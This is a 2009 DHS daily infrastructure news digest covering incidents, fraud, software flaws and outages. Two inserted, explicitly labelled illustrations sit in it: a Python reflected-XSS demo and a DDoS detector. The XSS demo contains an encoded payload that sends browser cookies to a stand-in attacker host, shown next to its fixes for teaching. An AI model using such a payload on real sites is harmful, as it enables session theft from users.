Department of Homeland Security Daily Open Source Infrastructure Report

Monday, August 24, 2009

Complete DHS Daily Report for August 24, 2009

Daily Report

Top Stories

 XETV 6 San Diego reports that a 300-gallon propane tank exploded on August 20 at John Lenore Company, a beverage distributing company, in San Diego, California. The explosion caused a fire which forced 50 people living in a one-mile radius to evacuate their homes. (See item 18)


18. August 21, XETV 6 San Diego – (California) 300-pound propane tank explodes at soda distributor. A 300-gallon propane tank exploded at a beverage distributing company Thursday afternoon in San Diego. It happened near the I-15 during rush hour traffic in Golden Hill and shut down part of the freeway for about an hour. The explosion caused a fire which forced several people living nearby to evacuate. Helicopters and fire trucks raced to the canyon setting of the John Lenore Company. At least 50 people living in a one-mile radius had to leave their homes. Firefighters say the tank explosion started parts of the building and the surrounding grass on fire. “When you have a propane tank burning, it’s going to be hot for a long time,” said the battalion chief with San Diego Fire. “It takes a long time to burn 300 pounds of propane.” Fire investigators are not sure why the tank exploded, but no one was injured. It is also unknown what type of health hazard the black smoke was to the area. Source: http://www.sandiego6.com/news/local/story/300-Pound-Propane-Tank-Explodes-at-Soda/nS1OsWkMZkC5KczAWiD8fA.cspx


 According to NBC Bay Area, arson investigators are investigating a car fire on August 20 near the Oakland, California home of the president of the entire University of California system, who has been the target of recent protests related to tuition hikes and employee furloughs approved to offset UC’s budget deficit. (See item 31)


31. August 20, NBC Bay Area – (California) Car torched outside UC president’s home. Arson investigators are investigating a car fire in Oakland. The suspected arson is getting extra attention because it happened near the home of the president of the entire University of California system. The FBI and ATF were called to help in the investigation. The Alameda County sheriff said it appears some sort of accelerant was used in the fire. The car was parked across the street from where the president lives. Authorities are not saying who owns the vehicle, other than it is not the president, who was taken by car out of the area just before 9 a.m. Thursday, but did not talk to reporters. Nobody was hurt in the fire. An Oakland police spokesman said investigators are not yet calling the fire arson because they have not ruled out the possibility that an electrical problem caused the fire. The university president has been the target of recent protests related to tuition hikes and employee furloughs approved to offset UC’s budget deficit. Source: http://www.nbcbayarea.com/news/local-beat/Car-Torched-Outside-UC-Presidents-Home-53805927.html


Details

Banking and Finance Sector

13. August 21, HedgeCo.net – (National) SEC halts phony investment fund by San Diego fraudster. The Securities and Exchange Commission on August 20 received permission to freeze the assets of a fraudster who allegedly raised as much as $70 million from 300 investors through his fund, MAK 1 Enterprises Group, LLC. The SEC says he solicited investors in Southern California and several other states, as well as a charitable foundation, through word-of-mouth referrals and a website. The defendant claimed to pool investor funds to invest in commercial paper, foreign currency trading products, and other investments, which the SEC believes to be non-existent. Instead, he misused investor funds to pay for several luxury cars and residential properties, including those now owned by his wife, who was also named as a relief defendant. The complaint alleges the fraudster fabricated and gave to an accountant a “screen shot” of MAK 1’s online banking activity purporting to show a balance of over $50 million in its bank account; in reality, the average daily balance in that account never exceeded $197,000. Source: http://www.hedgeco.net/news/08/2009/sec-halts-phony-investment-fund-by-san-diego-fraudster.html


14. August 20, The Register – (International) Security bugs crawl all over financial giant’s website. For the past five months, a website for investment services giant Ameriprise Financial contained bugs that allowed even low-level criminals to inject malicious content into official company webpages and steal users’ cookies, according to a web security expert. The XSS, or cross-site scripting, flaws made it possible for phishers to send Ameriprise customers bona fide links to the Ameriprise website that opened pages intermingling counterfeit content with legitimate text and graphics. The holes could also allow criminals to steal the browser cookies used to authenticate online accounts. In the five months since a researcher at HolisticInfoSec.org first identified the bugs, Ameriprise offered customers statements like this one, which assures visitors that “no one without the proper web browser configuration can view or modify information contained on our systems.” And yet, not one of the half-dozen warnings the researcher sent was answered. “The reality is that not enough of these companies at that level, particularly in the financial sector, properly do intake for vulnerabilities,” said the researcher. “There should be something on their site that says ‘If you see a security issue on our site, please report it.’” Source: http://www.theregister.co.uk/2009/08/20/ameriprise_website_vulnerabilities/
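The mechanism behind item 14, as an added illustration that is not part of the report and not Ameriprise’s code: a page that reflects a query parameter into its HTML unescaped lets a “bona fide” link to the real host carry a script that reads the session cookie, while the same page with output escaping and an HttpOnly session cookie does not. The handler names, the payload, and the host name evil.example are constructed for the example.

```python
import html
from urllib.parse import parse_qs

# Constructed sample: a link a phisher could send. The host is legitimate; only
# the query string is attacker-controlled. Decoded, the q parameter is
# <script>document.location='http://evil.example/?c='+document.cookie</script>
PHISHING_QUERY = (
    "q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F"
    "%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E"
)


def render_search_vulnerable(query_string: str) -> str:
    """Reflected XSS: the search term is placed into the markup as-is, so a
    script in the parameter runs in the origin of the real site."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for {q}</h1>"


def render_search_hardened(query_string: str) -> str:
    """Same page, but the attacker-controlled value is HTML-escaped before it
    is placed in element content, so the browser renders it as text."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie line for the session token. HttpOnly keeps it out of
    document.cookie, so even a residual XSS cannot read it; Secure keeps it
    off plaintext connections."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


def reflects_script(page: str) -> bool:
    """The check a scanner makes: did the raw <script> tag survive into the
    served markup?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print(render_search_vulnerable(PHISHING_QUERY))
    print(render_search_hardened(PHISHING_QUERY))
    print(session_cookie_header("example-session-id"))
```

Escaping at the point where untrusted data enters element content is the fix for the injection itself; the HttpOnly flag is defence in depth for the cookie-theft consequence the article describes, and costs nothing for a session token that only the server needs to read.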


Information Technology


35. August 21, The Register – (International) IM client library bug plagues Pidgin. Users of Pidgin and other alternative IM clients need to update their software following the discovery of potentially serious security flaws. Pidgin, Finch, Adium, Meebo, and Gaim are all vulnerable to a flaw that stems from a bug in Libpurple, library software for multi-protocol support that is used by many IM clients. The vulnerability stems from bugs in the software function that handles instant messages from the MSN network. The flaw was discovered by CORE Security. The flaw is particularly serious because all it takes to take advantage of the vulnerability is a message from a regular MSN user, not necessarily on a targeted user’s buddy list, the SANS Institute Internet Storm Centre warns. Users are advised to update to an IM client that uses non-vulnerable versions of Libpurple (version 2.5.9 or above). For Pidgin, the most common of the alternative IM packages affected, that means updating to version 2.5.9. The issue provides further evidence that users of alternative client software may remove themselves from the main line of attacks but not from the need to patch their systems. Source: http://www.theregister.co.uk/2009/08/21/im_client_security_update/

36. August 19, DarkReading – (International) Rare malware a hint of threats to come. While pervasive, widespread malware attacks like Conficker get all the attention, there is another generation of obscure and dangerous malware that so far is too rare to be considered a threat — but could provide a hint of things to come. Security researchers are seeing some intriguing malware in small pockets. One piece of malware found on a desktop machine during a forensics investigation was actually pre-coded to steal specific information from the victim’s organization, says the CEO and founder of HBGary, whose company sees about 5,000 new pieces of malware a day. “It knew what it was looking for,” he says. And the malware was disposable so that it could disappear without a trace after doing its dirty work. A common thread among most of these unusual or odd malware samples that typically fly under the radar is that they are all about going after specific information or data, rather than more general attacks that cast a wide net and make the headlines. And the writers of these lesser-known and uncommon malware packages are using new methods to keep the attacks alive longer — even if it means brazenly attacking researchers who try to study them. Even so, most attacks over the next five years will still come from the morphing malware variants that are common today, but in higher and higher volumes, experts say. “We’re going to have to deal with more volume and attacks. And at the same time, there will be instances of really high quality attacks, where the attackers have thought things through — and not for a quick buck, but for something sustainable,” says the chief security advisor for F-Secure. “We’ll see more malware families that are technically advanced and stay around for longer periods of time,” he says. “Instead of recompiling variants of existing [malware], they will be refined slowly but surely, in a controlled manner” with new features, as Conficker and Torpig were, he says. Source: http://www.darkreading.com/security/client/showArticle.jhtml?articleID=219400756

Communications Sector

37. August 21, TelecomTiger – (International) Tata Comm to offer built-in DDoS protection as part of Internet Access services in North America. Tata Communications announced that it will offer built-in Distributed Denial of Service (DDoS) detection and mitigation as part of its Dedicated Internet Access offering in North America. Enterprises in the region will be able to fend off DDoS attacks through Tata Communications’ Managed Security Service, which will deliver the protection as part of its Internet Clean Pipe services. The Internet Clean Pipe service absorbs attacks the moment attack traffic is detected on Tata Communications’ global IP backbone. Tata Communications is leveraging its partnership with Arbor Networks for this service. The chief security officer of Arbor Networks said: “Recent incidents such as those involving social networking, government, and commercial targets over the past month should serve as a stark reminder to any Internet-connected organization that DDoS remains a very real threat, and if unprepared, may result in considerable business impact. With the scale and sophistication of attacks today, enterprises must cooperate with their network services provider to obtain adequate protection in the event of such attacks.” Source: http://www.telecomtiger.com/fullstory.aspx?passfrom=enterprisestory&storyid=6945
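Item 37 describes detection on the backbone followed by absorbing the attack traffic. The following is an added example of the detection half, written for this report; it is not Tata Communications’ or Arbor Networks’ implementation. It runs a simple SYN-flood detector over constructed flow records (addresses from the TEST-NET ranges, record layout and thresholds assumed), and flags a destination only when both the SYN packet rate and the number of distinct sources are high, which is what separates a distributed flood from one noisy client.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    """One flow record as a backbone collector might export it (assumed layout)."""
    ts: float        # seconds since epoch
    src: str
    dst: str
    syn_only: bool   # TCP SYN set without ACK: connection attempts, not traffic
    packets: int


# Constructed sample: five ordinary flows to 203.0.113.10, then 200 SYN-only
# flows from 200 different sources to the same host inside one second, plus
# one stray SYN to another host.
SAMPLE_FLOWS = (
    [Flow(100.0 + i * 0.1, f"198.51.100.{i}", "203.0.113.10", False, 20) for i in range(5)]
    + [Flow(101.0 + (i % 10) * 0.05, f"192.0.2.{i}", "203.0.113.10", True, 3) for i in range(1, 201)]
    + [Flow(101.3, "198.51.100.7", "203.0.113.20", True, 1)]
)


def detect_syn_flood(flows, window=1.0, syn_threshold=500, min_sources=50):
    """Bucket SYN-only traffic by (destination, time window) and return one
    alert per bucket where the SYN packet count and the distinct-source count
    both exceed their thresholds. Thresholds are assumed values; a provider
    would derive them from a per-customer baseline."""
    syn_pkts = defaultdict(int)
    sources = defaultdict(set)
    for f in flows:
        if not f.syn_only:
            continue
        key = (f.dst, int(f.ts // window))
        syn_pkts[key] += f.packets
        sources[key].add(f.src)

    alerts = []
    for (dst, bucket), pkts in sorted(syn_pkts.items()):
        if pkts >= syn_threshold and len(sources[(dst, bucket)]) >= min_sources:
            alerts.append({
                "dst": dst,
                "window_start": bucket * window,
                "syn_packets": pkts,
                "sources": len(sources[(dst, bucket)]),
            })
    return alerts


def divert_targets(alerts):
    """The mitigation hand-off: the set of destination addresses whose traffic
    should be steered to scrubbing (the 'absorb' step in the article)."""
    return sorted({a["dst"] for a in alerts})


if __name__ == "__main__":
    found = detect_syn_flood(SAMPLE_FLOWS)
    for a in found:
        print(a)
    print("divert:", divert_targets(found))
```

Keying on distinct sources as well as packet rate matters in practice: a single misbehaving client is handled by ordinary rate limiting at the edge, whereas a flood from hundreds of sources is exactly the case where only the upstream provider has the vantage point and capacity to act.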


38. August 21, Albany Times-Union – (New York) Verizon criticized after outage at 911 center. Rensselaer County, New York, officials blame Verizon for the five-hour shutdown of the county’s Emergency 911 Dispatch Center on the night of August 19. This was the third time since December that the county lost its emergency dispatch center, which handles most fire, police and ambulance calls in the county, due to a power failure in South Troy. Officials said Thursday that Verizon knew its equipment serving the dispatch center was operating on battery backup because of a power outage but never took steps to bring in a generator or alert the county of the situation. The battery failed after its four hours of capacity were used up, and emergency calls in the county were routed to the State Police and the East Greenbush Police Department, which are the backups when the county system fails. Source: http://www.timesunion.com/AspStories/story.asp?storyID=833545&category=REGION


39. August 20, AngryCountry.com – (Tennessee) Nashville’s 98 WSIX studios severely damaged by large lightning strike. Clear Channel/Nashville, which includes WSIX, was rocked by a lightning bolt that struck the cluster’s ST/L (studio-transmitter link) on August 20. The bolt knocked out power for a short time and fried equipment throughout the building. “Two studios toast, one on life support; computers, sound cards, phone system and more up in smoke,” the WSIX programming director posted on his Facebook page. “Our engineering team is great. All five stations are on the air and nobody got hurt.” WSIX was off the air for nearly an hour, however. Source: http://magazine.angrycountry.com/article.php?story=20090820191800665